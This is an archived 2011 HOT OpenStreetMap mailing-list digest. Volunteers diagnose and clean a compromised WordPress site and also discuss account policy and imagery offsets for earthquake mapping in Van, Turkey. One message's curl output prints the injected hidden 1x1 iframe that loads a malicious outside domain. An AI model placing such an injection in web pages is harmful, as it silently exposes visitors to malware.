[HOT] Theme Hacked

Tue Oct 25 07:08:29 BST 2011

Theme Template files are directly editable from within the Admin interface. Easily. 

Sent from my phone.
May contain incom
plete thoughts.

On Oct 24, 2011, at 19:44, hot-request at openstreetmap.org wrote:

> Send HOT mailing list submissions to
>    hot at openstreetmap.org
> 
> To subscribe or unsubscribe via the World Wide Web, visit
>    http://lists.openstreetmap.org/listinfo/hot
> or, via email, send a message with subject or body 'help' to
>    hot-request at openstreetmap.org
> 
> You can reach the person managing the list at
>    hot-owner at openstreetmap.org
> 
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of HOT digest..."
> 
> 
> Today's Topics:
> 
>   1. Re: Malware on hot.openstreetmap.org (Harry Wood)
>   2. Passwords/Access on HOT Equipment (Kate Chapman)
>   3. Re: Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY 38.6
>      43.5(378fb) (Shu Higashi)
>   4. Re: Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY 38.6
>      43.5(378fb) (=?iso-8859-1?B?UGllcnJlIELpbGFuZA==?=)
> 
> 
> ----------------------------------------------------------------------
> 
> Message: 1
> Date: Mon, 24 Oct 2011 11:23:52 -0700 (PDT)
> From: Harry Wood <mail at harrywood.co.uk>
> To: Rodolphe Quiedeville <rodolphe at quiedeville.org>,    Kate Chapman
>    <kate at maploser.com>
> Cc: "hot at openstreetmap.org" <hot at openstreetmap.org>
> Subject: Re: [HOT] Malware on hot.openstreetmap.org
> Message-ID:
>    <1319480632.99218.YahooMailNeo at web160320.mail.bf1.yahoo.com>
> Content-Type: text/plain; charset="iso-8859-1"
> 
> FIXED!
> 
> ...or at least I have been able to remove the iframe from the index file which Rudolph identified earlier (thanks for that Rudolph). I also removed the google analytics bit from there. Wasn't sure if that was part of the attack or not, but I'm sure we can live without it for the moment. I haven't been able to take any other steps to check for malware or secure it better. If anyone can identify anything urgent I should be doing on there, let me know. I can run commands on there (via a php script as a wp plugin), ...however anything complicated is going to be a lot easier when Mikel is back with his ssh access 
> 
> 
> Harry Wood
> 
> 
> 
> ________________________________
> From: Rodolphe Quiedeville <rodolphe at quiedeville.org>
> To: Kate Chapman <kate at maploser.com>
> Cc: hot at openstreetmap.org
> Sent: Monday, 24 October 2011, 7:36
> Subject: Re: [HOT] Malware on hot.openstreetmap.org
> 
> Le 24/10/2011 08:28, Kate Chapman a ?crit :
>> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
>> missing something.
> 
> The iframe is not on the /weblog/ pages you can see it when you call the
> root url like this :
> 
> 
> rodo at elz:~$ curl hot.openstreetmap.org
> <html>
> <head>
> <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
> </head>
> <body><iframe
> src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
> width="1" height="1"></iframe>
> <script type="text/javascript">
> var gaJsHost = (("https:" == document.location.protocol) ?
> "https://ssl." : "http://www.");
> document.write(unescape("%3Cscript src='" + gaJsHost +
> "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
> </script>
> <script type="text/javascript">
> var pageTracker = _gat._getTracker("UA-5963453-1");
> pageTracker._trackPageview();
> </script>
> </body>
> </html>
> 
> Have a look at the beginning of body part
> 
> It's probably not in the theme part of Wordpress, but somewhere in the
> config parts of the blog.
> 
> Regards
> 
> 
> 
>> 
>> -Kate
>> 
>> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
>> <rodolphe at quiedeville.org> wrote:
>>> Hi,
>>> 
>>> Someone cracked the Wordpress installed on hot.openstreetmap.org and add
>>> an iframe to :
>>> 
>>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
>>> 
>>> Edit the wordpresss template, remove this iframe and it could resolve
>>> the problem. The security alert occurs on Firefox too.
>>> 
>>> Regards
>>> 
>>> 
>>> Le 23/10/2011 23:33, Kate Chapman a ?crit :
>>>> Hi Floris,
>>>> 
>>>> Yes, I know about the problem but haven't been able to fix it.? I think
>>>> logging into the server might be necessary, but I think only Mikel has
>>>> access.
>>>> 
>>>> If anyone has other suggestions please help.
>>>> 
>>>> Kate
>>>> 
>>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu
>>>> <mailto:osm at floris.nu>> wrote:
>>>> 
>>>> ? ?  I'm getting warnings from Chrome at the moment that
>>>> ? ?  hot.openstreetmap.org <http://hot.openstreetmap.org> is infected
>>>> ? ?  with malware.
>>>> 
>>>> ? ?  Anybody want to look into that?
>>>> 
>>>> ? ?  Here's the google diagnose page for it:
>>>> 
>>>> ? ? http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
>>>> ? ?  <http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en>
>>>> 
>>>> ? ?  Greetings,
>>>> ? ?  Floris Looijesteijn
>>>> 
>>>> ? ?  (tracing Van, Turkey)
>>>> 
>>>> ? ?  _______________________________________________
>>>> ? ?  HOT mailing list
>>>> ? ? HOT at openstreetmap.org <mailto:HOT at openstreetmap.org>
>>>> ? ? http://lists.openstreetmap.org/listinfo/hot
>>>> 
>>>> 
>>>> 
>>>> _______________________________________________
>>>> HOT mailing list
>>>> HOT at openstreetmap.org
>>>> http://lists.openstreetmap.org/listinfo/hot
>>> 
>>> 
>>> --
>>> Rodolphe Qui?deville
>>> http://cartosm.eu - Int?gration de carte libre sur site web
>>> Blog : http://blog.rodolphe.quiedeville.org/
>>> SIP/XMPP : rodolphe at quiedeville.org
>>> 
>>> _______________________________________________
>>> HOT mailing list
>>> HOT at openstreetmap.org
>>> http://lists.openstreetmap.org/listinfo/hot
>>> 
> 
> 
> -- 
> Rodolphe Qui?deville
> http://cartosm.eu - Int?gration de carte libre sur site web
> Blog : http://blog.rodolphe.quiedeville.org/
> SIP/XMPP : rodolphe at quiedeville.org
> 
> _______________________________________________
> HOT mailing list
> HOT at openstreetmap.org
> http://lists.openstreetmap.org/listinfo/hot
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: <http://lists.openstreetmap.org/pipermail/hot/attachments/20111024/7e1848d5/attachment-0001.html>
> 
> ------------------------------
> 
> Message: 2
> Date: Mon, 24 Oct 2011 11:31:41 -0700
> From: Kate Chapman <kate at maploser.com>
> To: Aaron Huslage <huslage at gmail.com>
> Cc: "HOT at OSM \(Humanitarian OpenStreetMap Team\)"
>    <hot at openstreetmap.org>
> Subject: [HOT] Passwords/Access on HOT Equipment
> Message-ID:
>    <CAGn7mOrVPdvv7ph3kW6OFQZMu99RjO0sYfGxX-vd_7kfzvAXag at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
> 
> Nobody is sharing passwords on these sites.  The HOT servers all
> require everyone to use their own SSH keys.  On the blog everyone has
> their own account.
> 
> -Kate
> 
> On Mon, Oct 24, 2011 at 10:59 AM, Aaron Huslage <huslage at gmail.com> wrote:
>> Any blog user should have their own account with the privileges they
>> need. We should delete the admin account and only use personal
>> accounts. Not everyone needs to be admin!
>> 
>> --
>> Aaron Huslage
>> sent via mobile device
>> 
>> On Oct 24, 2011, at 12:58 PM, "Jaakko Helleranta.com"
>> <jaakko at helleranta.com> wrote:
>> 
>>> LastPass allows sharing of passwords to individual users' LastPass accounts.
>>> I bet there is a range of opinions here about any use of password vaults, perhaps especially proprietary (albeit free) services. My own opinion is that it could b a good solution also for HOT's pwd mgmt.
>>> Cheers,
>>> -Jaakko
>>> 
>>> Sent from my BlackBerry? device from Digicel
>>> --
>>> Mobile: +509-37-26 91 54, Skype/GoogleTalk: jhelleranta
>>> 
>>> -----Original Message-----
>>> From: Harry Wood <mail at harrywood.co.uk>
>>> Date: Mon, 24 Oct 2011 09:23:50
>>> To: Kate Chapman<kate at maploser.com>; hot at openstreetmap.org<hot at openstreetmap.org>; ingenieroariel at gmail.com<ingenieroariel at gmail.com>
>>> Reply-To: Harry Wood <mail at harrywood.co.uk>
>>> Subject: Re: [HOT] Malware on hot.openstreetmap.org
>>> 
>>> _______________________________________________
>>> HOT mailing list
>>> HOT at openstreetmap.org
>>> http://lists.openstreetmap.org/listinfo/hot
>>> 
>>> _______________________________________________
>>> HOT mailing list
>>> HOT at openstreetmap.org
>>> http://lists.openstreetmap.org/listinfo/hot
>> 
> 
> 
> 
> ------------------------------
> 
> Message: 3
> Date: Tue, 25 Oct 2011 07:25:57 +0900
> From: Shu Higashi <s_higash at mua.biglobe.ne.jp>
> To: Pierre B?land <infosbelas-gps at yahoo.fr>
> Cc: HOT Openstreetmap <hot at openstreetmap.org>
> Subject: Re: [HOT] Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY
>    38.6    43.5(378fb)
> Message-ID:
>    <CAJPU9VWXRnHHa7GVAG_YOKTS7m50cEGPC4Am4FToZ3ok-yTCPA at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
> 
> Sorry for my wrong expression.
> 
> (1)43.31880, 38.52070
> (2)43.31906 , 38.52067
> (diff) (+0.00026) (-0.00003)
> 
> 2011/10/25, Shu Higashi <s_higash at mua.biglobe.ne.jp>:
>> I think the railway line need offset.
>> 
>> I adjusted the background imagery on Potlatch2 showing GPS log
>> and the offset value at the right side corner of the building was:
>> (1)43.31880->43.31906 (+0.00026)
>> (2)38.52070->38.52067 (-0.00003)
>> 
>> See attached file.
>> 
>> Shu Higashi
>> 
>> 2011/10/25, Pierre B?land <infosbelas-gps at yahoo.fr>:
>>> I also mapped without offset. But looking at a railway crossing Van (way
>>> id='15434974'), it looks better without offset. Look in particular in the
>>> harbour beside the lake. It is indicated in the changeset that it has
>>> been
>>> traced by GPS (see
>>> http://www.openstreetmap.org/browse/changeset/9133478).
>>> 
>>> There are reports that the town of Ercis (lat=39.02837&lon=43.3593 )
>>> north
>>> of Van lake also have damages. Many isolated villages could also have
>>> damages. It would be good to to obtain more detailed satellite imagery
>>> for
>>> the region.
>>> 
>>> Pierre B?land
>>> 
>> 
> 
> 
> 
> ------------------------------
> 
> Message: 4
> Date: Mon, 24 Oct 2011 19:43:52 -0400
> From: "=?iso-8859-1?B?UGllcnJlIELpbGFuZA==?="
>    <infosbelas-gps at yahoo.fr>
> To: "HOT Openstreetmap" <hot at openstreetmap.org>
> Subject: Re: [HOT] Fwd: 2011-10-23 10:41:21 (M 7.3) EASTERN TURKEY
>    38.6    43.5(378fb)
> Message-ID: <201110241943511878605 at yahoo.fr>
> Content-Type: text/plain; charset="iso-8859-1"
> 
> Higashi showed on 2011-10-24  18:20:19 
> a map of the railway line in Van from Potlatch2.
> 
> Without applying any offset to the Bing Imagery, I obtain a different map in both Potlatch2 and JOSM. The roads, the railway and the building over the railway are apparently properly aligned.
> 
> See map from Pottlatch2 at the following url : http://pierzen.dev.openstreetmap.org/hot/railway-van-turkey.jpg 
> 
> 
> Pierre B?land 
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: <http://lists.openstreetmap.org/pipermail/hot/attachments/20111024/e6767ef5/attachment.html>
> 
> ------------------------------
> 
> _______________________________________________
> HOT mailing list
> HOT at openstreetmap.org
> http://lists.openstreetmap.org/listinfo/hot
> 
> 
> End of HOT Digest, Vol 20, Issue 16
> ***********************************